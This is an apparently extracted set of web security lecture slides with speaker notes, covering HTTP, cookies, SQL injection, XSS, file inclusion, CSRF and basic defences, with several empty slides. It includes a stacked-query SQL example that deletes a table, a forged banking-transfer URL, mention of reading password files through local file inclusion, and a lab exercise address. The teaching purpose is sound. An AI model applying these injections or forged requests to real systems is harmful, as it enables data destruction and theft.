Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Web Security
Hello everyone, belongs to BCSE lessons series, today we will study about an important session
of Information Safety, that are attacks and defenses on Wed environment, Web Security; this is
a really important part of system security.
Slide 2
Content
1 Basic knowledge
4 Exercise
Tr 2
Basic knowledge
Tr 3
Tr 4
There are 3 parts of a website system executed: web server, web application, and database
Web server is a server installed with software serving to the web. It hears requests from user
and then deal with these requests, and sends back results to browser. The browser will display
these results to user.
Web application is a place where script or code from server build application executed. Some
popular languages from server are PHP, ASP.NET, JSP, Python,...
Database is a place where web application stores entire data and implement operations by
questions. Some popular database management systems are MySQL, SQL Server, Oracle.
Moreover, there are some non-relational database management systems, like MongoDB.
Understanding components of website system will give us a general view, then find weakness of
website.
Slide 5
HTTP protocol
HypeText Transfer Protocol
Protocol at application level
Connect between client and server
Used for World Wide Web
Tr 5
Tr 6
Tr 7
Tr 8
Status code belongs to response, whose format includes 3 digits, in which, the first digit defines
type of response, the next 2 digits indicate meaning of response
Code starting 1: inform that request is received and in process
Code starting 2: mean that request is accepted and dealt with successfully
Code starting 3: mean that some actions are needed to complete request, for example, redirect
(302)
Code starting 4: error from client, grammar of request is not accurate or cannot be
implemented.
Code starting 5: error from server, server fails to process a legal request.
Slide 9
Cookie
HTTP cookie, Web cookie, Browser
cookie
A small data segment saved in browser
of user
Size about 4Kb
Store status or actions informaiton of
user
Tr 9
Next, cookie
You may see it like a cake, but it is not.
cookie is also called HTTP cookie, web cookie, browser cookie; it is a small data segment (with
size about 4kb) sent from web server to browser and stored in this browser when user accesses
to the website. It is used to store status or actions of user (for example, whether user access to
website not, how much time user visits to this website, which products is in basket,…..)
Slide 10
Tr 10
Tr 11
The most familiar and dangerous vulnerability is SQL Injection . This is a technology enabling
attacker to take advantage of vulnerability of checking input data in web applications and error
announcements of database management system are sent back to inject and execute illegal SQL
command.
This fault often happens on web application having data managed by database management
system such as SQL Server, MySQL, Oracle.
Slide 12
Tr 12
Exploitation of SQL Injection can enable attackers to implement operation of adding, correcting,
and deleting on database of application. More dangerously, we can install webshell on the
system, gaining server control.
Slide 13
Tr 13
Tr 14
In accordance with SQLmap developer, there are some effective and free tools of detecting and
exploiting SQL Injection, with 5 main types of exploiting SQL Injection that are Boolean based
blind, Time based blind, error based, union query, stacked queries.
Firstly. Boolean based blind: fundamentals of this technology is to compare of right/wrong to
find each character of information such as table name, column name, etc
Due to broad comparison scope, exploitation of fault is mainly implemented by tool
Time based: this technology is based on process time of server for different requests to
determine each character of table, column
Next, error based: based on error announcement of database management system. This
technology is only used when web application configurated shows error announcements of
database management system.
Fourthly, using Union queries. This is a popular method when exploiting Sql Injection. Its
fundamentals is to use union keyword to gather results of select clause, then get information
from database
The last one is stack queries, also called piggy backing. By adding character ; (; is character
indicating to break command in sql), we can implement many sql commands at a request time,
for example SELECT * FROM products WHERE productid=1; DELETE FROM products
Slide 15
XSS (1)
Cross-Site Scripting
This technology enables hacker to insert
malware to website having
vulnerabilities
Tr 16
Let’s move to the second vulnerability: XSS. Cross-Site Scriptingl is a technology which enables
hacker to insert malware to website
Slide 17
XSS (2)
Threats
End user’s information gets stolen
Admin account is seized
Ill images are inserted into the website,
causing bad effect to reputation
Tr 17
XSS enables hacker to execute hazardous script on browser of user, this causes user’s
information is stolen, administrator account of administration page is held, website is inserted
with bad image, which will damage reputation of website of company and organization
Slide 18
XSS (3)
Exploits
Reflected XSS
Stored XSS
DOM Based XSS
Tr 18
In general, XSS is divided into three main types: Reflected XSS, Stored XSS và DOM based XSS
Slide 19
XSS (4)
Reflected XSS
Tr 19
The first is Reflected XSS. There are many ways to exploit through Reflected XSS; one of them is
to hold work session of users, then can access to data and hold their permission on website.
Look at the screen. This is scenarios of Reflected XSS.attack
Firstly, users log in a website and are affixed to a session. By means of something, hacker sends
to user with exploitation URL. Victim access to this URL, server will respond to this victim, with
data in request (javascript of hacker). Victim’s browsers executes javascirpt, victim’s session is
sent to hacker. Then, hacker can forge victim to implement all his permission on website.
Slide 20
XSS (5)
Stored XSS
Tr 20
XSS (6)
Stored XSS
Tr 21
XSS (7)
DOM based XSS
Tr 22
Tr 23
To continue, we will move to errors related to dealing with file unsafely , including File Inclusion
and Insecure File Upload
Slide 24
Tr 24
File Inclusion
This is a popular vulnerability in web application, which enables hacker to read sensitive files on
server, more dangerously, hacker can use Log Poisoning to upload web shell to server
Slide 25
Tr 25
There are 2 types of File Inclusion that are Local File Inclusion and Remote File Inclusion.
LFI is a technology enabling to read a file on the website, hacker can read much sensitive
information of server, such as file etc/password, php.ini,...
The second type is RFI, this is a technology calling to a file from another server, the content of
this file can contain malware độc (web shell,...)
Slide 26
Tr 26
CSRF (1)
One-click attack, session ridding, XSRF
Type of attack which cheats the last
user to implement unexpected actions
on a web application
Tr 27
CSRF, also called one-click attack, session riding, XSRF, is a type of attack which cheats the last
user to implement unexpected actions on a web application
Slide 28
CSRF (2)
Threats
User implement unexpected queries
without awareness
Lose data
Lose money
Affect image and reputation of users
…
Tr 28
CSRF (3)
Example:
A wants to transfer money to B
through Internet Banking service at
website ebanking.vn
URL for implementing this request is:
http://ebanking.com/transfer.do?acct
=B&amount=100
Tr 29
CSRF (4)
Examples:
By means of something, C knows structure
of this URL, C will corrects this URL
tohttp://ebanking.com/transfer.do?acct=C&
amount=100
C cheats A to implement this request (at the
moment A log in)
C gains 100$ !
Tr 30
- By means of something, C knows structure of this URL, C will corrects this URL to:
http://ebanking.com/transfer.do?acct=C&amount=100
- C cheats A to implement this request (at the moment A log in)
- C gains 100$
In order to cheat A to implement this request, for examples, sending URL through email,
facebook, today almost URL are reduced, thus, it is difficult to guess it
Slide 31
CSRF (5)
Analysis of causes:
Web application often manages users
through cookie
Web browser automatically attaches
cookie to requests sent to
http://bank.vn, anyone sends this
request.
Tr 31
CSRF (6)
Analysis of causes
If http://bank.vn has no mechanism to
identify request sent from
http://attacker.vn, attacker will have
entire control right for user’s session
Tr 32
OS Command Injection
Tr 33
SOLUTIONS
The next part of the lesson is solutions and prevention of threats from web vulnerabilities
Slide 35
Solutions
safe programming
Control strictly input data of user
client
server
Encode data sent back
Re-authenticate important operations,
for examples: transfer
Tr 35
Solutions
Configuration for system
Set strong password
Never set default setting
Grant minimum permission for users, for
system
Tr 36
Solutions
Update the latest version of software
and service
Close unnecessary service on system
Tr 37
Exercise
Tr 38
Requirements:
• Access to the address :
128.199.140.34:1337
• Implement exploitation of
vulnerabilities: SQL injection, XSS, LFI
Tr 39
Requirements:
Access to the address on slide
Implement exploitation of vulnerabilities: SQL injection, XSS, LFI
Slide 40
Tr 40